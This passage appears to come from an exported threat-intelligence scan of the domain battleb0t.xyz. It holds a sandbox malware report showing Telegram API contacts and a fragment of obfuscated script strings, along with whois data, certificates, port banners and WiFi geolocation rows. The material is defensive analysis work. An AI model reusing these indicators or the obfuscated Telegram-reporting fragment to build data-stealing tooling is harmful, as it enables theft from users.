"msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\UXTHEME.DLL" at base 183e0000\n "msedge.exe" loaded module "C:\\WINDOWS\\SYSTEM32\\WINDOWS.SYSTEM.PROFILE.PLATFORMDIAGNOSTICSANDUSAGEDATASETTINGS.DLL" at base c60000\n "msedge.exe" loaded module "NTDLL.DLL" at base 1da50000\n "msedge.exe" loaded module "API-MS-WIN-DOWNLEVEL-SHELL32-L1-1-0.DLL" at base 1afc0000\n "msedge.exe" loaded module "SHELL32.DLL" at base 1c3e0000\n "msedge.exe" loaded module "USER32.DLL" at base 1b070000'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"\n "Local\\SM0:3108:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:3108:304:WilStaging_02"\n "Local\\SM0:3108:120:WilError_01"\n "SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:3108:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:3108:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:443"\n "104.22.58.100:443"\n "65.8.158.45:443"\n "149.154.167.220:443"'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"@ntdll.dll"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.telegram.org"'}, {u'category': u'Pattern Matching', u'origin': u'YARA Signature', u'identifier': u'yara-104', u'name': u'YARA signature match - RC4 Encryption', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1486', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1486', u'relevance': 5, u'threat_level': 0, u'type': 13, u'description': u'YARA signature for RC4 encryption matched on file "widevinecdm.dll"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\000003.log]- [targetUID: 00000000-00003108]\n "dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\dff028b9-debb-425e-95ec-db6dcfe0c7a5.tmp]- [targetUID: 00000000-00003108]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003108]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003108]\n "recovery-component-inner.crx" has type "Google Chrome extension version 3"- Location: [%TEMP%\\3108_988682905\\recovery-component-inner.crx]- [targetUID: 00000000-00003108]\n "verified_contents.json" has type "JSON data"- Location: [%TEMP%\\3108_1946692508\\_metadata\\verified_contents.json]- [targetUID: 00000000-00003108]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42\\Ruleset Data]- [targetUID: 00000000-00003108]\n "safety_tips.pb" has type "data"- Location: [%TEMP%\\3108_1946692508\\safety_tips.pb]- [targetUID: 00000000-00003108]\n "LICENSE" has type "ASCII text with CRLF line terminators"- Location: [%TEMP%\\3108_1321371211\\LICENSE]- [targetUID: 00000000-00003108]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.fingerprint]- [targetUID: 00000000-00003108]\n "Tabs_13322050400392718" has type "data"- [targetUID: 00000000-00003108]\n "Filtering Rules-AA" has type "data"- Location: [%TEMP%\\3108_1321371211\\Filtering Rules-AA]- [targetUID: 00000000-00003108]\n "settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00003108]\n "crl-set" has type "data"- Location: [%TEMP%\\3108_2078777495\\crl-set]- [targetUID: 00000000-00003108]\n "542bbdf5-e20d-490f-b532-dad17c51b430.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\542bbdf5-e20d-490f-b532-dad17c51b430.tmp]- [targetUID: 00000000-00003108]\n "edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\edfd1835-3b13-413e-ace3-5b2b20c35b91.tmp]- [targetUID: 00000000-00003108]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003108]\n "53d044ee-9693-456b-888f-a32a00e16b55.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\53d044ee-9693-456b-888f-a32a00e16b55.tmp]- [targetUID: 00000000-00003108]\n "79c56db7-bc22-4724-af43-440425afe543.tmp" has type "Unknown"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\79c56db7-bc22-4724-af43-440425afe543.tmp]- [targetUID: 00000000-00003108]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 2, u'description': u'Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\10.34.0.42"\n Potential IP "10.34.0.42" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.42\\LICENSE"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-38', u'name': u'Uses HTTPS for communication', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 3, u'threat_level': 0, u'type': 7, u'description': u'"HTTPS traffic to 185.199.111.153 on port 443"\n "HTTPS traffic to 104.22.58.100 on port 443"\n "HTTPS traffic to 65.8.158.45 on port 443"\n "HTTPS traffic to 149.154.167.220 on port 443"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Heuristic match: "\',\'HTwmL\',\'FMZIW\',\'YxdVX\',\'UUudk\',\'osUws\',\'\\x22\\x20alt\',\'Vk_o8\',\'bmlnN\',\'JcovJ\',\'MJRMC\',\'bnPFS\',\'t\\x20:\\x20\',\'ZiAVF\',\'gUJej\',\'ABXSa\',\'Count\',\'sendM\',\'UeqSP\',\'LYCIA\',\'ine_a\',\'cETfn\',\'\\x20View\',\'bMiuV\',\'bot59\',\'ZhDfd\',\'nGSWQ\',\'UZgVS\',\'yzTJX\',\'btzqT\',\'#Date\',"\n Heuristic match: "api.telegram.org"\n Heuristic match: "fondon@fondon.org"'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-54', u'name': u'Making HTTPS connections using secure TLS/SSL version', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1573', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1573', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Connection was make using TLSv1.2 [tls.handshake.version: 0x00000303]'}, {u'category': u'Gener |
| 2023-05-12 02:59:47 | Affiliate - Domain Whois | No | Whois | 4 | 0 | 3 | 0 | None | Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: http://www.cloudflare.com
Updated Date: 2017-05-24T17:44:01Z
Creation Date: 2009-02-17T22:07:54Z
Registry Expiry Date: 2024-02-17T22:07:54Z
Registrar: CloudFlare, Inc.
Registrar IANA ID: 1910
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: serverDeleteProhibited https://icann.org/epp#serverDeleteProhibited
Domain Status: serverTransferProhibited https://icann.org/epp#serverTransferProhibited
Domain Status: serverUpdateProhibited https://icann.org/epp#serverUpdateProhibited
Name Server: NS3.CLOUDFLARE.COM
Name Server: NS4.CLOUDFLARE.COM
Name Server: NS5.CLOUDFLARE.COM
Name Server: NS6.CLOUDFLARE.COM
Name Server: NS7.CLOUDFLARE.COM
DNSSEC: signedDelegation
DNSSEC DS Data: 2371 13 2 32996839A6D808AFE3EB4A795A0E6A7A39A76FC52FF228B22B76F6D63826F2B9
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLOUDFLARE.COM
Registry Domain ID: 1542998887_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.cloudflare.com
Registrar URL: https://www.cloudflare.com
Updated Date: 2021-09-27T15:18:45Z
Creation Date: 2009-02-17T22:07:54Z
Registrar Registration Expiration Date: 2024-02-17T22:07:54Z
Registrar: Cloudflare, Inc.
Registrar IANA ID: 1910
Domain Status: clientdeleteprohibited https://icann.org/epp#clientdeleteprohibited
Domain Status: clienttransferprohibited https://icann.org/epp#clienttransferprohibited
Domain Status: serverdeleteprohibited https://icann.org/epp#serverdeleteprohibited
Domain Status: servertransferprohibited https://icann.org/epp#servertransferprohibited
Domain Status: serverupdateprohibited https://icann.org/epp#serverupdateprohibited
Domain Status: clientupdateprohibited https://icann.org/epp#clientupdateprohibited
Registry Registrant ID:
Registrant Name: DATA REDACTED
Registrant Organization: DATA REDACTED
Registrant Street: DATA REDACTED
Registrant City: DATA REDACTED
Registrant State/Province: CA
Registrant Postal Code: DATA REDACTED
Registrant Country: US
Registrant Phone: DATA REDACTED
Registrant Phone Ext: DATA REDACTED
Registrant Fax: DATA REDACTED
Registrant Fax Ext: DATA REDACTED
Registrant Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Admin ID:
Admin Name: DATA REDACTED
Admin Organization: DATA REDACTED
Admin Street: DATA REDACTED
Admin City: DATA REDACTED
Admin State/Province: DATA REDACTED
Admin Postal Code: DATA REDACTED
Admin Country: DATA REDACTED
Admin Phone: DATA REDACTED
Admin Phone Ext: DATA REDACTED
Admin Fax: DATA REDACTED
Admin Fax Ext: DATA REDACTED
Admin Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Tech ID:
Tech Name: DATA REDACTED
Tech Organization: DATA REDACTED
Tech Street: DATA REDACTED
Tech City: DATA REDACTED
Tech State/Province: DATA REDACTED
Tech Postal Code: DATA REDACTED
Tech Country: DATA REDACTED
Tech Phone: DATA REDACTED
Tech Phone Ext: DATA REDACTED
Tech Fax: DATA REDACTED
Tech Fax Ext: DATA REDACTED
Tech Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Registry Billing ID:
Billing Name: DATA REDACTED
Billing Organization: DATA REDACTED
Billing Street: DATA REDACTED
Billing City: DATA REDACTED
Billing State/Province: DATA REDACTED
Billing Postal Code: DATA REDACTED
Billing Country: DATA REDACTED
Billing Phone: DATA REDACTED
Billing Phone Ext: DATA REDACTED
Billing Fax: DATA REDACTED
Billing Fax Ext: DATA REDACTED
Billing Email: https://domaincontact.cloudflareregistrar.com/cloudflare.com
Name Server: ns3.cloudflare.com
Name Server: ns4.cloudflare.com
Name Server: ns5.cloudflare.com
Name Server: ns6.cloudflare.com
Name Server: ns7.cloudflare.com
DNSSEC: signedDelegation
Registrar Abuse Contact Email: registrar-abuse@cloudflare.com
Registrar Abuse Contact Phone: +1.4153197517
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:59:47Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Cloudflare provides more than 13 million domains with the tools to give their global users a faster, more secure, and more reliable internet experience.
NOTICE:
Data in the Cloudflare Registrar WHOIS database is provided to you by Cloudflare
under the terms and conditions at https://www.cloudflare.com/domain-registration-agreement/
By submitting this query, you agree to abide by these terms.
Register your domain name at https://www.cloudflare.com/registrar/
| cloudflare.com |
| 2023-05-12 02:56:53 | Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | panel.battleb0t.xyz | [{"url": "https://panel.battleb0t.xyz", "firewall": "Cloudflare", "detected": true, "manufacturer": "Cloudflare Inc."}, {"url": "https://panel.battleb0t.xyz", "firewall": "None", "detected": false, "manufacturer": "None"}] |
| 2023-05-12 02:50:15 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | funny.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 15 23:40:10 2023 GMT
Not After : Jun 13 23:40:09 2023 GMT
Subject: CN=funny.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:75:15:09:c5:81:bb:98:d9:cd:95:bf:a9:c2:90:
49:7e:c9:d9:5b:ca:38:d9:40:de:af:17:a2:51:84:
18:c1:ec:ed:c3:d5:19:f0:4f:41:01:a3:0d:ed:ef:
4f:5a:04:c7:16:79:5d:fa:96:dc:2a:ec:4f:7c:34:
46:4c:ee:fd:f2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
76:6F:61:1C:BE:F6:0B:43:74:69:9A:F6:F2:62:F9:6E:CA:07:05:76
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:funny.battleb0t.xyz, DNS:pics.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3c:23:1a:4a:59:35:02:c1:c6:ee:ce:b0:90:2b:32:ff:c3:73:
00:60:2e:9e:f9:30:da:4e:15:e2:5a:99:e8:dc:18:9e:39:ed:
69:f1:83:a4:0a:04:28:db:64:81:bf:64:61:e9:65:9c:4b:bf:
43:b4:21:89:ab:e2:5c:b4:ea:8e:55:b3:f4:e4:d9:42:3e:20:
e0:83:2a:75:f9:b5:2c:98:6f:90:e7:e4:4a:86:e5:ab:f3:97:
c8:a9:85:ff:6a:e9:35:8d:3d:30:f6:db:5e:e0:f1:27:f3:d3:
e7:f7:29:be:31:75:49:43:f6:99:93:6d:06:65:d1:3e:4c:29:
66:fd:2f:93:e9:c6:ec:30:8a:f2:58:08:03:45:02:a0:57:b1:
3b:0b:b4:a9:ed:aa:8b:9f:ac:43:5a:55:10:bb:1e:31:d5:e4:
c1:37:cd:22:a3:bd:26:b6:f1:01:e1:68:e2:c6:50:80:44:4b:
cd:a0:4a:80:cc:93:e4:1b:7e:d7:af:21:2c:ce:f2:c1:d0:70:
17:ad:3a:29:15:d4:b9:ee:11:c8:aa:7f:fa:b4:9a:33:05:ef:
47:de:10:55:c2:f1:9f:19:e4:ad:0a:83:ff:a1:86:3d:18:bd:
73:d4:39:8b:bb:51:02:17:cb:89:c6:27:d9:b8:f2:7c:d7:bd:
a5:b5:9a:11
|
| 2023-05-12 02:55:11 | Operating System | No | Censys | 0 | 0 | 2 | 0 | None | linux | 87.248.157.102 |
| 2023-05-12 03:01:41 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.189): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:28:03 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [185.199.111.133]
https://www.virustotal.com/en/ip-address/185.199.111.133/information/ | 185.199.111.0/24 |
| 2023-05-12 03:43:21 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 87.248.157.79:80 | 87.248.157.0/24 |
| 2023-05-12 02:55:44 | SSL Certificate - Raw Data | No | Certificate Transparency | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:c7:00:14:21:71:88:e2:18:10:f8:e3:ee:d1:89:37:10:7b
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:46:47 2022 GMT
Not After : Mar 27 01:46:46 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ca:91:c0:24:2c:ac:ca:ae:72:a2:1c:76:2b:73:
ee:03:78:0b:80:eb:3e:1e:2f:33:3d:ee:c9:08:d3:
24:62:ca:69:54:4a:4f:62:ee:85:3e:9e:5e:5f:d1:
1f:ab:8a:39:77:32:f2:c3:16:74:4d:2e:2a:61:7c:
7c:02:16:fd:f8:90:cd:06:b2:e9:f4:43:77:1b:75:
bb:be:c8:56:44:f6:50:11:ac:06:ec:e8:59:ef:64:
25:2f:4d:3f:96:fc:de:28:67:0a:4e:3f:7e:0e:35:
82:50:a2:e2:53:60:28:9a:07:c8:48:6d:b6:14:30:
5d:26:53:a7:34:c5:04:39:e7:67:e1:8b:e5:5d:a5:
3a:24:32:e3:b6:35:44:1a:60:82:6c:43:b7:4d:91:
70:e8:77:c6:32:fc:99:9f:ad:b8:12:75:4d:70:f3:
52:73:ab:3d:62:1e:0f:a1:00:40:14:f2:ee:4f:92:
e4:8c:8a:19:22:54:b9:c3:71:e1:6b:29:43:5b:56:
a9:e7:cc:16:78:2e:25:bc:fa:16:51:9d:87:b3:64:
aa:85:a8:c4:c7:1b:38:de:e1:9c:ae:93:7d:3f:98:
02:a9:aa:fa:8c:80:52:99:2e:98:ff:77:3d:76:8b:
8f:32:cd:03:00:51:9a:81:df:0d:68:7a:8d:16:fa:
b6:b1
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
6C:34:7D:03:48:53:73:CF:0D:0C:39:44:A5:D1:A0:E8:F3:90:7F:11
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
3e:fe:f9:21:a8:b9:ff:5b:d7:4e:56:e9:01:36:22:e4:80:7b:
32:28:4f:35:ce:d9:fe:79:61:21:91:08:a4:5a:99:cb:49:8d:
59:33:d8:1c:63:9a:1f:c2:49:d5:16:41:55:df:2b:23:f2:e9:
b3:cc:0e:45:14:b2:fe:94:7d:98:ee:51:3e:fe:8e:d3:e9:26:
e4:d9:13:e1:5b:9d:72:18:78:d0:8e:68:17:2a:3e:77:ec:ab:
7d:44:bc:01:fc:dc:0f:8f:d3:cb:10:ee:22:15:6e:05:13:f7:
e6:22:b4:eb:f4:fb:8e:2b:69:d7:32:d7:d5:70:69:43:51:d5:
4b:6b:0b:f8:e5:1a:2e:d7:2d:1d:78:46:8f:ca:f0:7d:23:fd:
88:d0:03:3c:9a:6c:c7:d3:59:0a:bf:a1:53:93:a9:52:44:05:
4e:9a:e7:34:e3:cf:4e:d3:8f:b2:a4:32:fc:7a:56:50:19:02:
1d:b0:d0:f6:ba:1e:0f:f4:0e:1e:fe:53:40:02:f1:88:3c:f3:
9b:b6:f5:bd:4d:b4:cd:f4:5c:5c:d1:5e:1f:d8:bc:e4:0a:75:
d6:3d:a2:7f:13:a1:4d:66:3a:7b:eb:4a:cf:7e:00:5d:ee:3b:
c3:4d:5a:49:d1:0b:e5:67:dc:0a:d3:3c:d7:f1:60:9d:30:79:
0a:39:a4:60
| battleb0t.xyz |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:03:67:CB) | 52.3759, 4.8975 |
| 2023-05-12 02:53:42 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.109.153:80 | 185.199.109.153 |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.66): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | lcgteach (Net ID: 00:0B:86:22:0F:30) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:01:32 | Web Server | No | Tool - WhatWeb | 0 | 0 | 3 | 0 | None | cloudflare | panel.battleb0t.xyz |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: webmailrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: webmailsession=%3ai7RZ7smCZHbrrA3k%2cc6f59b16b1db3e998a7645b6e2984b9e; HttpOnly; path=/; port=2095
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2095
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2095
Set-Cookie: roundcube_cookies=enabled; HttpOnly; expires=Fri, 10-May-2024 13:43:03 GMT; path=/; port=2095
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12499
| 87.248.157.102 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/carti_1.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | hoenes1 (Net ID: 00:0C:F6:59:F5:B4) | 50.8897, 6.0563 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTY5cg8s2 (Net ID: 88:96:4E:7F:0D:00) | 37.751, -97.822 |
| 2023-05-12 03:00:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.39): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | fotoosman (Net ID: 00:02:CF:D7:57:CF) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM"}],"group":"cf-nel","max_age":604800} | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
